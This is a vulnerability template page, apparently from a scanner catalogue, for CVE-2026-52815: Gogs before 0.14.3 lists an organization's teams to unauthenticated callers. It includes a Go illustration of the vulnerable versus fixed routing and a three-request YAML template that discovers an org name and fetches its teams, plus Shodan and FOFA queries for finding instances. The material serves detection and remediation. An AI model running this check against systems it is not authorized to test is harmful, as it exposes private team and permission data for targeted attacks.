Gogs < 0.14.3 - Unauthenticated Organization Teams Disclosure

CVE-2026-52815
Early Release

Description

Gogs before version 0.14.3 contains an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint returns all teams for any organization without requiring authentication. The route group lacks the reqToken() middleware, exposing team IDs, names, descriptions, and permission levels to any unauthenticated caller.
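The root cause named above is a route group registered without its authentication middleware. The following Go program is an added illustration, not Gogs code and not part of this advisory: it models an in-memory teams endpoint wired once the vulnerable way (no token check) and once behind a reqToken-style middleware, so the difference in behaviour for an unauthenticated caller can be exercised directly. The handler, the `Authorization: token <value>` header format, the sample organization and team data, and the token value are all constructed for this example; the real Gogs router and middleware are not reproduced.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// team carries the fields the advisory says the endpoint exposes.
type team struct {
	ID          int64  `json:"id"`
	Name        string `json:"name"`
	Description string `json:"description"`
	Permission  string `json:"permission"`
}

// Constructed sample data for the example; not real Gogs data.
var orgTeams = map[string][]team{
	"acme": {
		{ID: 1, Name: "Owners", Description: "Full control", Permission: "owner"},
		{ID: 2, Name: "Developers", Description: "Push access", Permission: "write"},
	},
}

// teamsHandler lists the teams of one organization, like the affected route.
// Path shape: /api/v1/orgs/{orgname}/teams
func teamsHandler(w http.ResponseWriter, r *http.Request) {
	parts := strings.Split(strings.Trim(r.URL.Path, "/"), "/")
	if len(parts) != 5 || parts[4] != "teams" {
		http.NotFound(w, r)
		return
	}
	teams, ok := orgTeams[parts[3]]
	if !ok {
		http.NotFound(w, r)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(teams)
}

// reqToken stands in for the missing middleware: it rejects any request that
// does not present a known bearer token (hypothetical "token <value>" format).
func reqToken(validTokens map[string]bool, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		const prefix = "token "
		auth := r.Header.Get("Authorization")
		if !strings.HasPrefix(auth, prefix) || !validTokens[strings.TrimPrefix(auth, prefix)] {
			w.Header().Set("Content-Type", "application/json")
			w.WriteHeader(http.StatusUnauthorized)
			json.NewEncoder(w).Encode(map[string]string{"message": "token is required"})
			return
		}
		next.ServeHTTP(w, r)
	})
}

// NewRouter builds the API mux. withAuth=false mirrors the vulnerable wiring
// (teams route registered without reqToken); withAuth=true is the fixed wiring.
func NewRouter(withAuth bool, validTokens map[string]bool) http.Handler {
	mux := http.NewServeMux()
	var teams http.Handler = http.HandlerFunc(teamsHandler)
	if withAuth {
		teams = reqToken(validTokens, teams)
	}
	mux.Handle("/api/v1/orgs/", teams)
	return mux
}

// Probe performs an in-process GET for an org's teams and returns the status
// code, so a test can check whether the route answers without credentials.
func Probe(h http.Handler, org, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/api/v1/orgs/"+org+"/teams", nil)
	if token != "" {
		req.Header.Set("Authorization", "token "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	tokens := map[string]bool{"constructed-example-token": true}
	vuln := NewRouter(false, tokens)
	fixed := NewRouter(true, tokens)
	fmt.Printf("vulnerable wiring, no token: %d\n", Probe(vuln, "acme", ""))
	fmt.Printf("fixed wiring, no token:      %d\n", Probe(fixed, "acme", ""))
	fmt.Printf("fixed wiring, valid token:   %d\n", Probe(fixed, "acme", "constructed-example-token"))
}
```

The useful regression check is the middle case: once the route group carries the token middleware, an unauthenticated request to the teams path must return 401 rather than the team list, which is what the 0.14.3 fix restores.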

Severity

Low

CVSS Score

4.3

Affected Product

gogs

Published Date

June 24, 2026

Template Author

0x_akoko

CVE-2026-52815.yaml
id: CVE-2026-52815

info:
  name: Gogs < 0.14.3 - Unauthenticated Organization Teams Disclosure
  author: 0x_Akoko
  severity: low
  description: |
    Gogs before version 0.14.3 contains an unauthenticated information disclosure vulnerability. The GET /api/v1/orgs/:orgname/teams endpoint returns all teams for any organization without requiring authentication. The route group lacks the reqToken() middleware, exposing team IDs, names, descriptions, and permission levels to any unauthenticated caller.
  impact: |
    An unauthenticated attacker can enumerate all teams within any organization including private teams, discover permission levels, map organizational structure, and identify high-value admin and owner teams for targeted attacks.
  remediation: |
   Update Gogs to version 0.14.3 or later.
  reference:
    - https://github.com/gogs/gogs/security/advisories/GHSA-744x-3838-5r56
    - https://nvd.nist.gov/vuln/detail/CVE-2026-52815
  classification:
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
    cvss-score: 4.3
    cve-id: CVE-2026-52815
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 3
    vendor: gogs
    product: gogs
    shodan-query: 'http.title:"Gogs"'
    fofa-query: title="Gogs"
  tags: cve,cve2026,gogs,exposure,unauth

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/repos/search?limit=1"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: orgname
        part: body
        group: 1
        regex:
          - '"username"\s*:\s*"([^"]+)"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/orgs/{{orgname}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"username\"", "\"full_name\"")'
        internal: true
        condition: and

  - raw:
      - |
        GET /api/v1/orgs/{{orgname}}/teams HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"id\"", "\"name\"", "\"permission\"")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100a9525f9e2727d39db7843263877b35f0a0853f2c70060fa6e5f3f99913d7b81f022100d1d68293fdf7e8b3cd699ed1fbaf0d0597cbbf900cb452ba56a9af67d3ae90ad:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2026-52815
CWE ID: CWE-200

References

https://github.com/gogs/gogs/security/advisories/GHSA-744x-3838-5r56
https://nvd.nist.gov/vuln/detail/CVE-2026-52815

Remediation Steps

Update Gogs to version 0.14.3 or later.